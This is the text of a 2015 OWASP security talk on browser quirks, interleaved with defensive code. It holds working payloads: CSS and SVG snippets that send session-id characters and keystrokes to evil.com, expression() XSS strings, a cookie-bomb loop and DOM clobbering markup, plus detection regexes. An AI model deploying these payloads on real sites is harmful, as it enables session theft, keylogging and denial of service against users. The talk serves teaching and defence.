I Didn't See That Coming
OWASP Cluj-Napoca 29th January 2015
Who am I?
CSS
HTML
SCRIPTS
Cascading Style Sheets
Style sheet language used for describing the look and formatting of a document written in a markup language.
Facts
18 years old;
Invented by Opera CTO Håkon Wium Lie;
It was a competitor to Netscape's JSSS;
Originally it was a "Style Sheet Language".
Problems
CSS Expressions (IE 5-10)
Data Leakage via Attribute-Selector
Mutation XSS
And ++
<p style=color:expression(alert(1))>
IN: <p style="font-family":'\22\3bx:expression(alert(1))/*'">
OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
SESSIONS OWNAGE
CSS
@-moz - Gecko-engine-specific rule
document - Rule that restricts the style rules contained within it based on the URL of the document.
regexp("") {} - Regular expressions are patterns used to match character combinations in strings.
ul li:nth-child(n){} - Selector matches every element that is the nth child, regardless of type, of its parent.
background:url() - Loads the background image from a URL, which may point to another origin.
Attack
@-moz-document regexp(".*PHPSESSID=0.*"){
ul li:nth-child(1){background:url(//evil.com/?character:0#position:0)}
}
@-moz-document regexp(".*PHPSESSID=.0.*"){
ul li:nth-child(2){background:url(//evil.com/?character:0#position:1)}
}
Brute-force 0-9 | a-z | A-Z
http://html5sec.org/cssession/?PHPSESSID=SESSION_ID
For more information, check Mario Heiderich's research.
http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf
http://www.slideshare.net/x00mario/stealing-the-pie
KEYLOGGER
SVG
Scalable Vector Graphics is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation.
set - The ‘set’ element provides a simple means of just setting the value of an attribute for a specified duration.
attributeName - The attribute being set, here xlink:href.
to - Specifies the value for the attribute during the duration of the ‘set’ element.
accessKey() - Describes a key press event and an optional offset that will begin the element.
SVG
Attack
<svg height="0px">
<image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
<set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
...
<set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
</image>
</svg>
Map: a-z | A-Z | 0-9
http://html5sec.org/keylogger/
For more information, check Mario Heiderich's research.
http://www.nds.rub.de/media/emma/veroeffentlichungen/2012/08/16/scriptlessAttacks-ccs2012.pdf
http://www.slideshare.net/x00mario/stealing-the-pie
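As an added defender-side example (not code from the talk or from Mario Heiderich's work), a triage filter that flags the CSS primitives from the session-stealing slides and the expression() slide above, together with the SVG keylogger primitives; the rule ids, messages and the evil.example host are constructed for this example:

```javascript
// Pattern-based triage of user-supplied CSS and SVG for the scriptless
// primitives on the slides. Rule ids, messages and sample inputs are constructed.
const CSS_RULES = [
  { id: 'css-expression', re: /expression\s*\(/i,
    why: 'IE 5-10 evaluates expression() as script' },
  { id: 'moz-document', re: /@-moz-document\b/i,
    why: '@-moz-document applies rules conditionally on the page URL' },
  { id: 'url-regexp', re: /\bregexp\s*\(/i,
    why: 'regexp() on the URL tests a session id character by character' },
  { id: 'attr-selector', re: /\[[^\]]+[\^$*]=/,
    why: 'prefix/suffix attribute selectors leak attribute values (tokens)' },
  { id: 'external-url', re: /url\(\s*["']?\s*(?:https?:)?\/\//i,
    why: 'url() to another origin turns a selector match into an outbound request' },
];

const SVG_RULES = [
  { id: 'svg-accesskey', re: /\bbegin\s*=\s*["']?\s*accessKey\s*\(/i,
    why: 'accessKey() timing fires the animation on a key press (keylogger)' },
  { id: 'svg-animated-href', re: /<(?:set|animate)\b[^>]*attributeName\s*=\s*["']?(?:xlink:)?href/i,
    why: '<set>/<animate> on href retargets a resource load' },
  { id: 'svg-external-target', re: /\b(?:href|to)\s*=\s*["']?\s*(?:https?:)?\/\//i,
    why: 'off-site href/to value causes an outbound request' },
];

// Returns the rules that matched; an empty array means nothing suspicious was seen.
const audit = (text, rules) =>
  rules.filter(r => r.re.test(text)).map(({ id, why }) => ({ id, why }));
const auditCss = css => audit(css, CSS_RULES);
const auditSvg = svg => audit(svg, SVG_RULES);

// Constructed samples modelled on the slides' payloads, plus one benign stylesheet.
const SAMPLE_CSS = `@-moz-document regexp(".*PHPSESSID=0.*"){
  ul li:nth-child(1){background:url(//evil.example/?character:0#position:0)}
}`;
const SAMPLE_SVG = `<svg height="0px"><image xlink:href="none">
<set attributeName="xlink:href" begin="accessKey(a)" to="//evil.example/?a"/>
</image></svg>`;
const BENIGN_CSS = 'p { color: #333; background: url(/img/bg.png) }';
```

These regexes are a triage filter only; a sanitizer for untrusted CSS or SVG should parse the input and allowlist properties, at-rules and elements rather than pattern-match.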
CONDITIONAL
COMPILATION
What is it?
Conditional compilation lets you dictate to IE whether to compile certain parts of your JScript or JavaScript code depending on predefined and user defined conditions.
Supported in Internet Explorer (4-10);
Lost...
<script>
/*@cc_on @*/
/*@
document.write("JavaScript version: " + @_jscript_version + ".");
document.write("<br />");
@if (@_win32)
document.write("Running on the 32-bit version of Windows.");
@elif (@_win16)
document.write("Running on the 16-bit version of Windows.");
@else
document.write("Running on a different operating system.");
@end
@*/
</script>
But as always
<script>@set@a=1alert(1)</script>
Local Page
COOKIE BOMB
let's break the Internet!
How? Cookies.
What? Your browser will keep sending those cookies and servers will reject the requests.
Why? Because the Cookie header will be very long.
Result: the entire Internet looks down to you.
Some technical info
Max cookie size: 4k;
Max number of cookies: No idea but enough;
What do I need? JS Execution on a Domain including Subdomains.
Attack
var pollution = Array(4000).join('a');
for(var i=1;i<99;i++){
document.cookie='bomb'+i+'='+pollution+';'
}
Any Site
For more information, check Egor Homakov's research.
http://homakov.blogspot.ro/2014/01/cookie-bomb-or-lets-break-internet.html
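As an added server-side example (not code from the talk or from Homakov's post), a guard that spots an oversized Cookie header and answers with Set-Cookie expiries instead of letting the request fail; the 4 KB limit, the cookie names and the www.domain.com host are assumptions, and handle() is written for Node's http.createServer:

```javascript
// Assumption: tune this to the header limit of the front-end server.
const COOKIE_LIMIT_BYTES = 4096;

function cookieHeaderBytes(cookieHeader) {
  return new TextEncoder().encode(cookieHeader || '').length;
}

function cookieNames(cookieHeader) {
  return (cookieHeader || '').split(';')
    .map(pair => pair.trim().split('=')[0])
    .filter(Boolean);
}

// One expiry per cookie name for the host and each parent domain: a bomb planted
// from a subdomain may carry any of those Domain= values, and a Set-Cookie only
// clears a cookie whose Domain and Path match. Cookies planted with a Path other
// than "/" are not covered here.
function expireCookieHeaders(cookieHeader, hostname) {
  const labels = hostname.split('.');
  const domains = [];
  for (let i = 0; i < labels.length - 1; i++) domains.push(labels.slice(i).join('.'));
  const out = [];
  for (const name of cookieNames(cookieHeader)) {
    out.push(`${name}=; Max-Age=0; Path=/`);
    for (const d of domains) out.push(`${name}=; Max-Age=0; Path=/; Domain=${d}`);
  }
  return out;
}

// null means the request may go on to the application; otherwise the clearing response.
function cookieBombResponse(cookieHeader, hostHeader) {
  if (cookieHeaderBytes(cookieHeader) <= COOKIE_LIMIT_BYTES) return null;
  const hostname = (hostHeader || '').split(':')[0];
  return {
    status: 200,
    headers: { 'Content-Type': 'text/plain', 'Set-Cookie': expireCookieHeaders(cookieHeader, hostname) },
    body: 'Oversized cookies were cleared; please reload.',
  };
}

// Usage: http.createServer(handle).listen(8080)
function handle(req, res) {
  const r = cookieBombResponse(req.headers.cookie, req.headers.host);
  if (!r) { res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); return; }
  res.writeHead(r.status, r.headers);
  res.end(r.body);
}
```

The front end in front of Node must accept the bloated header (nginx's large_client_header_buffers, for instance) or this handler never sees the request and the user still gets a 400.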
PAGE DOS & ++
What are you talking about? User-supplied HTML elements with name attributes matching DOM variables would prevent JavaScript from accessing those variables.
Tell me more... An element like <img src='something.png' name='querySelector'> would cause JavaScript references to document.querySelector to return the image element rather than the querySelector function.
JavaScript namespace clobbering
Examples
<img src="#" name="user-content-top">
<img src="#" name="user-content-window">
<img src="#" name="user-content-location">
<img src="#" name="user-content-document">
<img src="#" name="user-content-history">
<img src="#" name="user-content-screen">
<img src="#" name="user-content-postMessage">
<img src="#" name="user-content-atob">
<img src="#" name="user-content-onload">
<img src="#" name="user-content-onkeyup">
<img src="#" name="user-content-onkeypress">
<img src="#" name="user-content-onkeydown">
<img src="#" name="user-content-images">
<img src="#" name="user-content-head">
<img src="#" name="user-content-body">
<img src="#" name="user-content-cookie">
<img src="#" name="user-content-URL">
<img src="#" name="user-content-domain">
<img src="#" name="user-content-referrer">
<img src="#" name="user-content-title">
For more information, check Mathias Karlsson's work.
https://bounty.github.com/researchers/avlidienbrunn.html
Remember DOM Clobbering?
<script>
if(top!=self){
top.location=self.location
}
</script>
<form name=self location="javascript:alert(1)"></form>
<script>
if(top!=self){
top.location=self.location
}
</script>
PATCHED!
http://www.thespanner.co.uk/2013/05/16/dom-clobbering/
For more information, check Gareth Heyes' research.
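As an added example (not code from the talk, GitHub or Gareth Heyes' post), a Node simulation of the querySelector clobbering described above together with two mitigations: taking the method from the prototype, and GitHub's "user-content-" prefix. FakeDocument and the element string are stand-ins: a browser resolves a named <img name=...> on document before the prototype, which the own property below imitates.

```javascript
// Stand-in for the browser Document; only the method the slides talk about.
class FakeDocument {
  querySelector(selector) { return `matched:${selector}`; }
}

// What untrusted HTML such as <img name="querySelector"> does to document:
// the named element shadows the builtin (simulated as an own property).
function clobber(doc, name, element) {
  Object.defineProperty(doc, name, { value: element, configurable: true, enumerable: true });
}

// Mitigation 1: fetch the method from the prototype chain, never from the
// instance, so a same-named element cannot shadow it
// (in a browser: Document.prototype.querySelector.call(document, selector)).
function safeQuerySelector(doc, selector) {
  const fn = Object.getPrototypeOf(doc).querySelector;
  if (typeof fn !== 'function') throw new TypeError('querySelector is not available');
  return Reflect.apply(fn, doc, [selector]);
}

// Mitigation 2 (GitHub's fix): namespace every user-supplied id/name so it can
// never equal a DOM property; wouldClobber() tells whether a raw name collides
// with anything reachable on the given hosts (in a browser: document, window).
const USER_PREFIX = 'user-content-';
const prefixUntrustedName = name => USER_PREFIX + name;
const wouldClobber = (name, ...hosts) => hosts.some(h => name in h);

function demo() {
  const document = new FakeDocument();
  const before = document.querySelector('p');                      // "matched:p"
  clobber(document, 'querySelector', '<img name="querySelector">');
  return {
    before,
    clobberedType: typeof document.querySelector,                  // "string": calling it throws
    viaPrototype: safeQuerySelector(document, 'p'),                // still "matched:p"
    rawCollides: wouldClobber('querySelector', document),          // true
    prefixedCollides: wouldClobber(prefixUntrustedName('querySelector'), document), // false
  };
}
```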
FILL DISK
Driving people crazy...
Why? For Fun And/Or Profit.
How? HTML5 localStorage.
What? The localStorage standard was developed to allow sites to store larger amounts of data (like 5-10 MB) than was previously allowed by cookies (like 4KB).
But are there limits?
Yeah..
5 MB per origin in Google Chrome, Mozilla Firefox, and Opera;
10 MB per storage area in Internet Explorer;
25MB per origin on BlackBerry 10 devices.
But...
"Attacking..."
Subdomains are your friends:
1.domain.com; 2.domain.com; ...; N.domain.com.
http://www.filldisk.com/
It's Over!
Credits
Images by sheeps.it
Presentation:
by Renato Rodrigues | @simps0n | pathonproject.com
Content:
Github | html5sec.org | @homakov | @avlidienbrunn | @.mario | @
By Renato Rodrigues
Weird stuff on the web. An overview of glitches in technology used every day!